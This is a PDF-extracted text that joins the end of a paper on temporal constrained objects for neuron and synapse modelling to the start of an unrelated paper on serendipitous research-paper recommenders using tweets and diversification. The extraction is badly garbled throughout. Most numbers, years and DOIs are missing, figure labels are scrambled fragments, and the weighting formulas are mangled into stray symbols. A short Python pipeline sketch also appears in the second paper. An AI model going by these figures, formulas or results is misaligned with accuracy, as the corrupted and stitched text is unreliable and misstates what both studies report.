a closer approximation of post-synaptic dynamics was obtained by employing double exponential models. fluctuations of synaptic conductance were approximated using rise time and decay time of conductance change independently (fig. c). the activation kinetics of excitatory and inhibitory synaptic receptors was modelled using ampa, nmda, gabaa and gabab receptor behaviour (fig. d). in the models, ampa channels mediated the fast-excitatory transmission and were characterized by fast rise time and decay time for the conductance values. significantly slower nmda channel modelled related to modifications of synaptic efficacy and temporal summation of currents. in the implementations, the two primary inhibitory receptor kinetics; gabaa and gabab modelled the fast and slow time course of inhibitory interactions. correctness of computations and performance improvements in tcob models to test numerical accuracy of tcob for floating point computations, the results of numerical integration of tcob were compared with imperative c++ implementation. fourth-order runge–kutta integration technique was employed for solving differential equations in the imperative implementation while numerical approximation using . . . . . . time (ms) c on du ct an ce ( g sy n) tau= ms tau= ms . . . time (ms) c on du ct an ce ( g sy n) tau= ms tau= ms - - - - - - time (ms) c on du ct an ce ( g sy n) taurise= ms ,taudecay= ms taurise= ms ,taudecay= ms - - - time (ms) c on du ct an ce ( g sy n) ampanmda gabaa gabab ba c d figure reconstructing synaptic dynamics using temporal constrained objects. (a) the conductance changes in alpha function for � = ms and � = ms. (b) synaptic conductance modelled using single exponential function for � = ms and � = ms. (c) synaptic conductance modelled using double exponential function. (d) modelled conductance changes for ampa, nmda, gabaa and gabab synapses for input spike at time t = ms. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ euler approach was used for the current tcob models. it has been observed that the membrane voltage traces produced by both approaches were approximately similar for the entire time evolution (figs. a– c). in this paper, we present the core concepts of tcob and we have not discussed library support for the language. it is straightforward to make standard solvers for differential equations, such as runge–kutta, as library functions so that the programmer does not have to define them. however, these solvers need to be ‘programmed’ by the end user, the specification occurs at a much higher level than would be the case in an imperative language such as c or c++. although loc are not always a definitive measure of software complexity, the declarative approach of a temporal constrained object model significantly reduced coding time, making the model more compact and closer to the problem specification, and hence also easier to understand, similar to scripting languages used in computational modelling. in comparison with the c++ version of the hh model, which required about loc, the temporal constrained object version was implemented in just loc. tcob compiler translates the temporal constrained objects program into prolog code which can be executed directly under swi-prolog with a clp(r) library. 
the potential sources of performance inefficiency of tcob are due to the layers of predicate calls arising from the systematic translation and also due to the repeated checking of consistency in the underlying constraint store. to alleviate these inefficiencies, we adapted - - voltage plots time (ms) v o lta g e (m v ) c++ tcob . . . . - - time (ms) v o lt a g e (m v ) c++ tcob a . . . . . . time step e xe cu tio n t im e ( s) translated code partially evaluated code b d partial evaluation - - tcob - - c++ v o lta g e (m v ) v o lta g e (m v ) time (ms) time (ms) c figure correctness of computations and performance improvement. (a) hh model voltage traces simulated using c++ and tcob for pa input current. inset shows the area of voltage plot in which absolute error was high. (b) firing patterns for spike train adaptation of neurons modelled with adex model and implemented in tcob. (c) firing patterns for spike train adaptation of neurons modelled with adex model and implemented in c++. (d) time step vs. execution time plot for hh model to show the improvement in performance time for partially evaluated code. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and extended a partial evaluation technique (kannimoola, jayaraman & achuthan, ) for optimized code generation of constrained object programs that was first presented in tambay ( ). given the translated prolog program of tcob and a top-level goal, the partial evaluator outputs the list of constraints that need to be solved for the given goal. the partial evaluation process makes our implementation independent from constraint solver. on an intel i processor-based desktop computer with gb memory, the partially evaluated code for hh model executed approximately six times faster than the corresponding normal code (fig. d). discussion temporal constrained objects were able to successfully recreate substantive classes of neuroscience models related to time-varying behaviour using a declarative approach. with large-scale brain circuit models in mind, the compositional modelling requirement was tested by mathematically reconstructing the constituent components of neuronal network, i.e., neurons and synapses. models that followed continuous-time functions, such as the hh type neuron model, as well as different synaptic models were implemented in temporal constrained objects easily. special mention must be made of how temporal constrained objects were able to express voltage-reset models which exhibit piecewise continuous-time behaviour through a constant reset of the voltage. these models exhibit both discrete and continuous state changes, in contrast to the continuous-time behaviour of hh type neuron models. such systems that exhibited discontinuous behaviour or choice, such as the izhikevich- and adex-type neuron models, required injecting a discontinuous change during constraint-solving. temporal constrained objects were able to elegantly support this capability using series variables and conditional constraints, i.e., whenever the condition was met for resetting the voltage, the value of the series variable at the applicable point in time is set appropriately. it should be noted that this is not an imperative update of a state variable but rather the declarative specification of a value at a new point in time of the series variable. 
both continuous and voltage reset behaviour of the models implemented in temporal constrained objects, generated typical firing patterns of different neurons. even though we have used manually defined synaptic connections in the example scripts, conditional constraints and dynamic typing in tcob enables to use dynamic construction of objects based on the various conditions of the networks. since temporal constrained objects also supports unbounded arrays, neurons can be programmed to receive dynamic stimuli generated from constraints. since tcob programming environment use swi-prolog built-in predicates to create random numbers, synaptic jitter and other forms of randomness in the network can also be modelled easily. having been able to test that the tractability of employing temporal constrained objects as arbitrary neuron models, we perceive that temporal constrained object implementations allow continuous functions as in hh models or discrete state change of functions as in voltage reset models. constraint-based systems accumulate and aggregate the partial information from the set of constraints. moreover, the order of constraint specification does not depend on the final result, which permits the incremental addition of information to the constraint nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ store at any point of execution without worrying about the computation state. temporal constrained object-like frameworks are well-suited for modelling systems from which useful inferences are to be derived based on partial or incomplete information available at the current stage. in computational neuroscience of neurons and circuits, this feature enables the modeller to process information incrementally at each functional zone with in specialized brain circuits. conclusion in our temporal constrained object implementation, the modelled neural responses reproduced biologically validated and relevant outputs as observed in experiments. the identification of global constraints of the system are to be tested on a larger scale, i.e. at the population level. debugging network models in such frameworks has been changed to a constraint satisfaction problem where the constraint-solving algorithms operate on the constraint representation of the network variables, their domain and a set of relations between these variables. successively imposing constraints with the level of details expected makes the system automatically scalable in terms of its software representation. although the current implementation of temporal constrained objects is not most efficient to compare with specialised simulators available for computational neuroscience, it is hoped that with novel re-implementation of the temporal constrained objects programming platform, we would be able to express models for large-scale reconstructions in the future. with new computing architecture and multiple core gpus and cpus, it is crucial to consider declarative modelling strategies that allow implicit parallelization. this re-implementation, however, pilots a general-purpose constrained object-based programming paradigm to declaratively express both the concept space and computational space of neuron models where the model evaluations are automatically handled by the computational engine. 
while declarative languages provide a much higher level of abstraction and are more scalable, the execution of declarative programs under early implementations faced performance bottlenecks. since slight changes in the constraint formulation may lead to unpredictable changes in the performance of the system, the stability of the constraint formulation of a model has always been a challenge. similar limitations exist when applying cost optimization techniques (barták, ). over the years, with advances in compiler and hardware technologies, the performance of declarative programs has improved significantly, but it is still not equal to that of imperative programs such as c or c++. detailed performance measures were introduced to reduce the execution time using methodologies such as compile-time optimization and partial evaluation. with these improvements, we feel that our proposed paradigm of temporal constrained objects is a good candidate for modelling small- to medium-scale brain circuit structures. in order to build constrained-object-based simulators for large-scale networks, we propose studying the parallelization of temporal constrained objects. temporal constrained objects with parallelization are a promising approach for representing the emergent properties of systems that are otherwise too complex to model at multiple translational levels.

acknowledgements

this work derives direction and ideas from the chancellor of amrita university, sri mata amritanandamayi devi.

additional information and declarations

funding
this work was partially supported by grant sr/csri/ / from the department of science and technology, by the young faculty research fellowship (sir visvesvaraya phd scheme, meity, government of india), and by embracing the world. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: department of science and technology: sr/csri/ / , young faculty research fellowship.

competing interests
the authors declare that they have no competing interests.

author contributions
- manjusha nair conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
- jinesh manchan kannimoola conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
- bharat jayaraman conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
- bipin nair analysed the data, authored or reviewed drafts of the paper, approved the final draft.
- shyam diwakar conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft.
data availability

the following information was supplied regarding data availability:
github: https://github.com/compneuro/tcob_neuron.

supplemental information

supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references

barták r. constraint programming: in pursuit of the holy grail. proceedings of the week of doctoral students. prague: univerzita karlova.
benhamou f, jussien n, o'sullivan ba. trends in constraint programming. london: wiley-iste.
bezzi m, nieus t, coenen ojmd, d'angelo e. an integrate-and-fire model of a cerebellar granule cell. neurocomputing.
borning a. the programming language aspects of thinglab, a constraint-oriented simulation laboratory. acm transactions on programming languages and systems.
brette r, gerstner w. adaptive exponential integrate-and-fire model as an effective description of neuronal activity. journal of neurophysiology.
campeotto f, dal palù a, dovier a, fioretto f, pontelli e. exploring the use of gpus in constraint solving. lecture notes in computer science.
cannon rc, gleeson p, crook s, ganapathy g, marin b, piasini e, silver ra. lems: a language for expressing complex biological models in concise and hierarchical form and its use in underpinning neuroml. frontiers in neuroinformatics.
covert mw, famili i, palsson bo. identifying constraints that govern cell behavior: a key to converting conceptual to computational models in biology? biotechnology and bioengineering.
d'angelo e. neural circuits of the cerebellum: hypothesis for function. journal of integrative neuroscience.
d'angelo e, de filippi g, rossi p, taglietti v. synaptic excitation of individual rat cerebellar granule cells in situ: evidence for the role of nmda receptors. journal of physiology.
darlington j, reeve m, wright s. declarative languages and program transformation for programming parallel systems: a case study. concurrency: computation practice and experience.
davison ap, brüderle d, eppler j, kremkow j, muller e, pecevski d, perrinet l, yger p. pynn: a common interface for neuronal network simulators. frontiers in neuroinformatics.
destexhe a, mainen zf, sejnowski tj. kinetic models of synaptic transmission. cambridge: mit press.
diesmann m, gewaltig m-o. nest: an environment for neural systems simulations. in: plesser t, macho v, eds. forschung und wissenschaftliches rechnen. göttingen: beiträge zum heinz-billing-preis.
diwakar s, magistretti j, goldfarb m, naldi g, d'angelo e. axonal na+ channels ensure fast spike activation and back-propagation in cerebellar granule cells. journal of neurophysiology.
felgentreff t, millstein t, borning a, hirschfeld r. checks and balances: constraint solving without surprises in object-constraint programming languages. oopsla: proceedings of the acm sigplan international conference on object-oriented programming, systems, languages, and applications.
freeman-benson bn, maloney j, borning a. an incremental constraint solver. communications of the acm.
fritzson p. principles of object-oriented modeling and simulation with modelica. hoboken: wiley-ieee press.
gleeson p, crook s, cannon rc, hines ml, billings go, farinella m, morse tm, davison ap, ray s, bhalla us, barnes sr, dimitrova yd, silver ra. neuroml: a language for describing data driven models of neurons and networks with a high degree of biological detail. plos computational biology.
goddard nh, hood g. large scale simulation using parallel genesis. in: the book of genesis. new york: springer.
goodman d, brette r. brian: a simulator for spiking neural networks in python. frontiers in neuroinformatics.
govindarajan k, jayaraman b, mantha s. optimization and relaxation in constraint logic languages. symposium on principles of programming languages. new york: acm.
gupta v, jagadeesan r, saraswat v, bobrow dg. programming in hybrid constraint languages. in: proceedings of the workshop on hybrid systems. berlin: springer.
gutkin b, pinto d, ermentrout b. mathematical neuroscience: from neurons to circuits to systems. journal of physiology.
hines ml, carnevale nt. the neuron simulation environment. neural computation.
hodgkin al, huxley af. currents carried by sodium and potassium ions through the membrane of the giant axon of loligo. journal of physiology.
hon a, chun w. constraint programming in java with jsolver. in: proceedings of paclp, the practical application of constraint technologies and logic programming, london.
horn b. siri: a constrained-object language for reactive program implementation. pittsburgh, pa: school of computer science, carnegie mellon university.
horn b. constrained objects. phd thesis, carnegie mellon university.
hucka m, finney a, sauro hm, bolouri h, doyle jc, kitano h, arkin ap, bornstein bj, bray d, cornish-bowden a, cuellar aa, dronov s, gilles ed, ginkel m, gor v, goryanin ii, hedley wj, hodgman tc, hofmeyr jh, hunter pj, juty ns, kasberger jl, kremling a, kummer u, le novère n, loew lm, lucio d, mendes p, minch e, mjolsness ed, nakayama y, nelson mr, nielsen pf, sakurada t, schaff jc, shapiro be, shimizu ts, spence hd, stelling j, takahashi k, tomita m, wagner j, wang j. the systems biology markup language (sbml): a medium for representation and exchange of biochemical network models. bioinformatics.
hutchison d, mitchell jc. principles and practice of constraint programming (cp). berlin, heidelberg: springer.
izhikevich em. simple model of spiking neurons. ieee transactions on neural networks.
jayaraman b, tambay p. modeling engineering structures with constrained objects. lecture notes in computer science: practical aspects of declarative languages.
kandel er, schwartz jh, jessell tm, mack s. principles of neural science. mcgraw-hill.
kannimoola jm, jayaraman b, achuthan k. dynamic constrained objects for vehicular system modeling. in: workshop on applied formal methods for safety-critical systems. singapore: springer.
kannimoola jm, jayaraman b, achuthan k. declarative modeling and verification of firewall rules with temporal constrained objects. in: symposium on application of formal methods for safety & security of critical systems. singapore: springer.
kannimoola jm, jayaraman b, thampy p, achuthan k. temporal constrained objects: application and implementation. computer languages, systems & structures.
koch c, segev i. methods in neuronal modeling: from ions to networks. cambridge: mit press.
lago jm, artalejo mr. a declarative framework for object-oriented programming with genetic inheritance. theoretical computer science.
leler w. specification and generation of constraint satisfaction systems. d. phil. thesis, university of north carolina.
lloyd jw. practical advantages of declarative programming. in: joint conference on declarative programming. pisa: italian association for logic programming.
lopez g, freeman-benson b, borning a. constraints and object identity. in: tokoro m, pareschi r, eds. object-oriented programming. ecoop. berlin, heidelberg: springer.
markram h. the blue brain project. nature reviews neuroscience.
mccormick da, wang z, huguenard j. neurotransmitter control of neocortical neuronal activity and excitability. cerebral cortex.
medini c, vijayan a, d'angelo e, nair b, diwakar s. computationally efficient bio-realistic reconstructions of cerebellar neuron spiking patterns. in: proceedings of the international conference on interdisciplinary advances in applied computing (iconiaac), new york.
nair m, subramanyam k, nair b, diwakar s. parameter optimization and nonlinear fitting for computational models in neuroscience on gpgpus. in: proceedings of the ieee international conference on high performance computing and applications (ichpca). piscataway: ieee.
naud r, marcille n, clopath c, gerstner w. firing patterns in the adaptive exponential integrate-and-fire model. biological cybernetics.
pushpendran m. a constraint object approach to systems biology. m.sc. thesis, state university of new york.
raikov i. nineml: a description language for spiking neuron network modeling: the abstraction layer. bmc neuroscience.
ray s, bhalla us. pymoose: interoperable scripting in python for moose. frontiers in neuroinformatics.
reiner mj, zimmer d. object-oriented modelling of wind turbines and its application for control design based on nonlinear dynamic inversion. mathematical and computer modelling of dynamical systems.
richmond p, cope a, gurney k, allerton dj. from model specification to simulation of biologically constrained networks of spiking neurons. neuroinformatics.
roggeri l, rivieccio b, rossi p, d'angelo e. tactile stimulation evokes long-term synaptic plasticity in the granular layer of cerebellum. journal of neuroscience: the official journal of the society for neuroscience.
rolf cc. parallelism in constraint programming. d. phil. thesis, lund university.
roth a, van rossum mcw. modeling synapses. in: eric ds, ed. computational modeling methods for neuroscientists. cambridge: mit press.
solinas s, nieus t, d'angelo e. a realistic large-scale model of the cerebellum granular layer predicts circuit spatio-temporal filtering properties. frontiers in cellular neuroscience.
tambay py. constrained objects for modeling complex systems. d. phil. thesis, state university of new york.
zaytsev yv, morrison a. cynest: a maintainable cython-based interface for the nest simulator. frontiers in neuroinformatics.
influence of tweets and diversification on serendipitous research paper recommender systems

chifumi nishioka ,*, jörn hauke ,* and ansgar scherp
kyoto university, kyoto, japan
christian-albrechts-universität kiel, kiel, germany
university of essex, colchester, uk
* these authors contributed equally to this work.

abstract

in recent years, a large body of literature has accumulated around the topic of research paper recommender systems. however, since most studies have focused on the variable of accuracy, they have overlooked the serendipity of recommendations, which is an important determinant of user satisfaction. serendipity is concerned with the relevance and unexpectedness of recommendations, and so serendipitous items are considered those which positively surprise users. the purpose of this article was to examine two key research questions: firstly, whether a user's tweets can assist in generating more serendipitous recommendations; and secondly, whether the diversification of a list of recommended items further improves serendipity. to investigate these issues, an online experiment was conducted in the domain of computer science with subjects. as an evaluation metric, we use the serendipity score (srdp), in which the unexpectedness of recommendations is inferred by using a primitive recommendation strategy. the results indicate that a user's tweets do not improve serendipity, but they can reflect recent research interests and are typically heterogeneous. contrastingly, diversification was found to lead to a greater number of serendipitous research paper recommendations.

subjects: data mining and machine learning, digital libraries
keywords: recommender system, experimental study, user study, scholarly articles, serendipity, digital library

introduction

to help researchers overcome the problem of information overload, various studies have developed recommender systems (beel et al., ; bai et al., ). recommendations are generated based on considerations such as a user's own papers (sugiyama & kan, ; kaya, ) or the papers a user has accessed or liked in the past (nascimento et al., ; achakulvisut et al., ). most previous studies have focused only on improving the accuracy of recommendations, one example of which is normalised discounted cumulative gain (ndcg).
however, several studies on recommender systems conducted in other domains (e.g. movies) have drawn attention to the fact that there are important aspects other than accuracy (mcnee, riedl & konstan, ; herlocker et al., ; kotkov, wang & veijalainen, ; kotkov, veijalainen & wang, ). one of these aspects is serendipity, which is concerned with the unexpectedness of recommendations and the degree to which recommendations positively surprise users (ge, delgado-battenfeld & jannach, ). a survey by uchiyama et al. ( ) revealed that researchers think it is important for them to be recommended serendipitous research papers. in this article, we study a research paper recommender system focusing on serendipity. sugiyama & kan ( ) investigated serendipitous research paper recommendations, focusing on the influence of dissimilar users and the co-author network on recommendation performance. in contrast, this study investigates the following research questions:

- (rq1) do a user's tweets generate serendipitous recommendations?
- (rq2) is it possible to improve a recommendation list's serendipity through diversification?

we run an online experiment to facilitate an empirical investigation of these two research questions using three factors. for rq1, we employ the factor user profile source, where we compare two sources of user profiles: firstly, a user's own papers; and secondly, a user's tweets. the user's own papers are a feature of existing recommender systems, as evidenced by the work conducted by sugiyama & kan ( ) and google scholar (https://scholar.google.co.jp/). in this study, we assume that the user's tweets produce recommendations that cannot be generated based on papers, since researchers tweet about recent developments and interests that are not yet reflected in their papers (e.g. what they found interesting at a conference or in their social network) (letierce et al., ). in addition, they are likely to have used their twitter accounts to express private interests. we conjecture that taking private interests into consideration delivers serendipitous recommendations, since the recommender system will then suggest research papers that include both professional interests and private interests, and which are thus likely to be serendipitous. we also observed that recommendations based on a user's tweets received a precision of %, which is fairly high, in the domain of economics (nishioka & scherp, ). furthermore, we analyse the factor text mining method, which applies different methods to the candidate items (i.e. research papers) for computing profiles, as well as to user profiles comprising different content (i.e. tweets or previous papers).
as text mining methods, we compare tf-idf (salton & buckley, ) with two of its recent extensions, namely cf-idf (goossen et al., ) and hcf-idf (nishioka, große-bölting & scherp, ). both have been associated with high levels of performance in recommendation tasks (goossen et al., ; nishioka, große-bölting & scherp, ). we introduce this factor because text mining methods can have a substantial influence on generating recommendations. for rq2, we introduce the factor ranking method, where we compare two ranking methods: firstly, classical cosine similarity; and secondly, the established diversification algorithm ia-select (agrawal et al., ). cosine similarity has been widely used in recommender systems (lops, de gemmis & semeraro, ), while ia-select ranks candidate items with the objective of diversifying recommendations in a list. since it broadens the coverage of topics in a list, we assume that ia-select delivers more serendipitous recommendations compared to cosine similarity. along with the three factors user profile source, text mining method, and ranking method, we conduct an online experiment in which subjects receive research paper recommendations in the field of computer science. as an evaluation metric, we use the serendipity score (srdp), which takes the unexpectedness and usefulness of recommendations into account. it considers a recommendation as unexpected if it is not recommended by a primitive recommendation strategy (i.e. baseline). the results reveal that a user's tweets do not improve the serendipity of recommender systems. on the other hand, we confirm that the diversification of a recommendation list by ia-select delivers more serendipitous recommendations to users. the remainder of the paper is organised as follows: firstly, we describe related studies; in turn, we describe the recommender system and the experimental factors and evaluation setup; and finally, before concluding the article, we report on and discuss the experimental results.

related work

over the last decade, many studies have developed research paper recommender systems (beel et al., ; bai et al., ). according to beel et al. ( ), more than half of these studies ( %) have applied a content-based approach. collaborative filtering was applied by % and graph-based recommendations, utilising citation networks or co-authorship networks, were applied by %. other studies have employed stereotyping, item-centric recommendations, and hybrid recommendations. in this article, we employ a content-based approach, as a number of works have done in the past with promising results (sugiyama & kan, ; nascimento et al., ; achakulvisut et al., ; kaya, ).

clarifying the notion of serendipity

most existing studies have evaluated research paper recommender systems by focusing on measures of accuracy, including precision, mean reciprocal rank (mrr), and normalised discounted cumulative gain (ndcg). however, studies that have addressed recommender systems in other domains (e.g. movies) argue that there are important considerations other than accuracy (mcnee, riedl & konstan, ; herlocker et al., ). one of these considerations is serendipity, which is a term that has been defined differently in the literature in the context of recommender systems.
for instance, kotkov, wang & veijalainen ( ) defined serendipity as "a property that indicates how good a recommender system is at suggesting serendipitous items that are relevant, novel and unexpected for a particular user." similarly, herlocker et al. ( ) defined serendipity as a measure of the extent to which the recommended items are both attractive and surprising to the users. other researchers have offered comparable definitions of serendipity (shani & gunawardana, ). according to ge, delgado-battenfeld & jannach ( ), it is important to recognise two important aspects of serendipity: firstly, a serendipitous item should be unknown to the user and, moreover, should not be expected; and secondly, the item should be interesting, relevant, and useful to the user. taking these two aspects into account, ge, delgado-battenfeld & jannach ( ) proposed a quantitative metric to evaluate the degree to which recommender systems are effective at generating serendipitous recommendations. most recently, kotkov et al. ( ) conducted a literature review and operationalised common definitions of serendipity. regarding unexpectedness, they organised four different definitions:

- unexpectedness to be relevant (i.e. a user does not expect an item to be relevant).
- unexpectedness to be found (i.e. a user would not have found this item on their own).
- implicit unexpectedness (i.e. an item is significantly dissimilar to items a user usually consumes).
- unexpectedness to be recommended (i.e. a user does not expect an item to be recommended).

in terms of novelty, they set two different definitions:

- strict novelty (i.e. a user has never heard about an item or has consumed it and forgotten about it).
- motivational novelty (i.e. a user has heard about an item, but has not consumed it).

this resulted in 4 × 2 = 8 definitions of serendipity. in addition, they investigated the effects of the different definitions of serendipity on preference broadening and user satisfaction. they found that all variations of unexpectedness and novelty broaden user preferences, but one variation of unexpectedness (unexpected to be relevant) hurts user satisfaction. in this study, we evaluate the serendipity of recommendations using the metric proposed by ge, delgado-battenfeld & jannach ( ). the metric considers a recommendation as unexpected if it is not recommended by a primitive recommendation strategy (i.e. baseline). thus, this study takes into account "unexpectedness to be found" and "unexpectedness to be recommended" among the different variations of unexpectedness proposed by kotkov et al. ( ). we choose this definition of serendipity as it is most relevant in our library context, where we recommend scientific papers to researchers (vagliano et al., ).

use of social media for serendipitous recommendations

in previous studies addressing content-based research paper recommender systems (beel et al., ; bai et al., ), the authors calculated recommendations based on a user's own papers (sugiyama & kan, ) or papers a user has read in the past (nascimento et al., ). in other domains, several studies have developed content-based recommender systems (chen et al., ; orlandi, breslin & passant, ; shen et al., ) that utilise data from a user's social media accounts, including twitter and facebook.
another study proposed research paper recommendations based on a user's tweets, which received a relatively high precision of % (nishioka & scherp, ). however, we hypothesise that because researchers tweet about recent developments and interests that are not yet reflected in their papers (letierce et al., ), a user's tweets will deliver recommendations that are not generated based on papers. in the context of research paper recommender systems, sugiyama & kan ( ) investigated serendipitous research paper recommendations, focusing on the influence of dissimilar users and the co-author network on recommendation performance; however, the researchers evaluated their approaches using accuracy-focused evaluation metrics such as ndcg and mrr. uchiyama et al. ( ) considered serendipitous research papers to be papers that are similar to, but in different fields from, the user's own field. in contrast, this article investigates serendipitous research paper recommendations from the perspective of tweets and diversification.

use of diversification for serendipitous recommendations

as discussed above, unexpectedness is a key concept for serendipity (ge, delgado-battenfeld & jannach, ). one approach that can be used to generate unexpected recommendations relates to diversification (ziegler et al., ; agrawal et al., ). this is because diversification leads to the creation of recommendation lists that include dissimilar items, meaning that users have an opportunity to encounter items they are unfamiliar with. ia-select (agrawal et al., ) has been used in the past as a solid baseline for diversifying lists of recommendations (vargas & castells, ; vargas, castells & vallet, ; wu et al., ). additionally, maximum marginal relevance (mmr) (carbonell & goldstein, ) is a well-known diversification method. kotkov, veijalainen & wang ( ) proposed a serendipity-oriented greedy (sog) algorithm, which diversifies a list of recommendations by considering unpopularity and dissimilarity. in this article, we employ ia-select, because the experimental research conducted by vargas & castells ( ) shows that ia-select performs better in general and because the sog algorithm requires a parameter setting.

experimental factors

in this article, we build a content-based recommender system along the three factors user profile source, text mining method, and ranking method. it works as follows (a small code sketch of this pipeline is given below):

(1) candidate items of the recommender system (i.e. research papers) are processed by one of the text mining methods, and paper profiles are generated. a candidate item and the set of candidate items are referred to as d and D, respectively. d's paper profile p_d is represented by a set of features f and their weights. depending on the text mining method, a feature f is either a textual term or a concept. formally, paper profiles are described as p_d = {(f, w(f, d)) | ∀ f ∈ F}. the weighting function w returns the weight of a feature f for a given text (here, a candidate item d); this weight identifies the importance of the feature f for that text.

(2) a user profile is generated from the user profile source (i.e. tweets or own papers) using the same text mining method that is applied to generate the paper profiles. I_u is the set of data items of a user u; in this article, I_u is either a set of a user's tweets or a set of a user's own papers. u's user profile p_u is represented in a way that makes it comparable to p_d: p_u = {(f, w(f, I_u)) | ∀ f ∈ F}.

(3) one of the ranking methods, described below, determines the order of the recommended papers.
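the following is a minimal, hypothetical python sketch of the three-step pipeline above: building feature-weight profiles for the candidate papers and for the user, and ranking papers by profile similarity. the extract_features helper and the plain term-frequency weighting are simplifications standing in for the text mining methods described in the next section; they are not the authors' implementation.

import math
from collections import Counter

def extract_features(text):
    # hypothetical stand-in for the text mining step (tf-idf, cf-idf or hcf-idf):
    # here we simply lower-case the text and split on whitespace
    return text.lower().split()

def build_profile(texts):
    # a profile is a mapping of features to weights, mirroring p_d and p_u above;
    # plain frequencies are used instead of the weighting functions for brevity
    counts = Counter()
    for t in texts:
        counts.update(extract_features(t))
    return dict(counts)

def cosine(p, q):
    shared = set(p) & set(q)
    num = sum(p[f] * q[f] for f in shared)
    den = math.sqrt(sum(w * w for w in p.values())) * math.sqrt(sum(w * w for w in q.values()))
    return num / den if den else 0.0

# step (1): paper profiles, step (2): user profile, step (3): ranking
papers = {"d1": "serendipity in research paper recommender systems",
          "d2": "parallel constraint solving on gpus"}
paper_profiles = {d: build_profile([text]) for d, text in papers.items()}
user_profile = build_profile(["tweets and own papers about recommender systems"])
ranking = sorted(paper_profiles,
                 key=lambda d: cosine(user_profile, paper_profiles[d]), reverse=True)
print(ranking)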
the experimental design is illustrated in the table below, where each cell is a possible design choice in each factor. in this section, we first provide a detailed account of the factor user profile source. in turn, we show the three different text mining methods that were applied in the experiment. finally, we note the details of the factor ranking method, which examines whether diversification improves the serendipity of recommendations.

table: experimental factors and design choices.
  user profile source: twitter | own papers
  text mining method: tf-idf | cf-idf | hcf-idf
  ranking method: cosine similarity | ia-select

user profile source

in this factor, we compare the following two data sources that are used to build a user profile.

- research papers: the research papers written by a user are used as a baseline. this approach is motivated by previous studies that have investigated research paper recommender systems, including sugiyama & kan ( ) and google scholar.
- twitter: in contrast to the user's papers, we assume that using tweets leads to more serendipitous recommendations. it is common practice among researchers to tweet about their professional interests (letierce et al., ). therefore, tweets can be used to build a user profile in the context of a research paper recommender system. we hypothesise that a user's tweets improve the serendipitous nature of recommendations because researchers are likely to tweet about recent interests and information (e.g. from social networks) that are not yet reflected in their papers.

text mining method

for each of the two data sources (i.e. the user's own papers or their tweets) and the candidate items, we apply one of three text mining methods. specifically, we compare tf-idf (salton & buckley, ), cf-idf (goossen et al., ), and hcf-idf (nishioka, große-bölting & scherp, ) to build the paper profiles and the user profile. this factor was introduced because the effectiveness of each text mining method is informed by the type of content that will be analysed (e.g. tweets or research papers). for each method, a weighting function w is defined. this weighting function assigns a specific weight to each feature f, which is a term in tf-idf and a semantic concept in cf-idf and hcf-idf.

- tf-idf: since tf-idf is frequently used in recommender systems as a baseline (goossen et al., ), we also use it in this study. terms are lemmatised and stop words are removed (http://www.nltk.org/book/ch .html). in addition, terms with fewer than
� cf-idf: concept frequency inverse document frequency (cf-idf) (goossen et al., ) is an extension of tf-idf, which replaces terms with semantic concepts from a knowledge base. the use of a knowledge base decreases noise in profiles (abel, herder & krause, ; middleton, shadbolt & de roure, ). in addition, since a knowledge base can store multiple labels for a concept, the method directly supports synonyms. for example, the concept “recommender systems” of the acm computing classification systems (acm ccs) has multiple labels, including “recommendation systems”, “recommendation engine”, and “recommendation platforms”. the weighting function w for cf-idf is defined as: wcf ‐idfða; tÞ ¼ cf ða; tÞ � log jdj jfa d : d djg ( ) cf returns the frequency of a semantic concept a in a text t. the second term presents the idf, which measures the relative importance of a semantic concept a in a corpus d. � hcf-idf: finally, we apply hierarchical concept frequency inverse document frequency (hcf-idf) (nishioka, große-bölting & scherp, ), which is an extension of cf-idf. hcf-idf applies a propagation function (kapanipathi et al., ) over a hierarchical structure of a knowledge base to assign a weight to concepts at higher levels. in this way, it identifies concepts that are not mentioned in a text but which are highly relevant. hcf-idf calculates the weight of a semantic concept a in a text t as follows: whcf ‐idfða; tÞ ¼ blða; tÞ � log jdj jfd d : a dgj ( ) bl(a, t) is the belllog propagation function (kapanipathi et al., ), which is defined as: blða; tÞ ¼ cf ða; tÞ þ flðaÞ � x aj pcðaÞ blðaj; tÞ ( ) where cf(a, t) is a frequency of a concept a in a text t, and flðaÞ ¼ log ðnodesðhðaÞ þ ÞÞ . the propagation function underlies the assumption that, in human memory, information is represented through associations or semantic nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ networks (collins & loftus, ). the function h(a) returns the level, where a concept a is located in the knowledge base. additionally, nodes provides the number of concepts at a given level in a knowledge base, and pc(a) returns all parent concepts of a concept a. in this study, we employ hcf-idf since it has been shown to work effectively for short pieces of text, including tweets (nishioka & scherp, ), in the domain of economics. ranking method finally, we rank all the candidate items to determine which items should be recommended to a user. in this factor, we compare two ranking methods: cosine similarity and diversification with ia-select (agrawal et al., ). � cosine similarity: as a baseline, we employ a cosine similarity, which has been widely used in content-based recommender systems. the top-k items with largest cosine similarities are recommended. � ia-select: following this, we employ ia-select (agrawal et al., ) to deliver serendipitous recommendations. ia-select was originally introduced for information retrieval, but it is also used in recommender systems to improve serendipity (vargas, castells & vallet, ). this use case stems from the algorithm’s ability to diversify recommendations in a list, which relies on the avoidance of recommending similar items (e.g. research 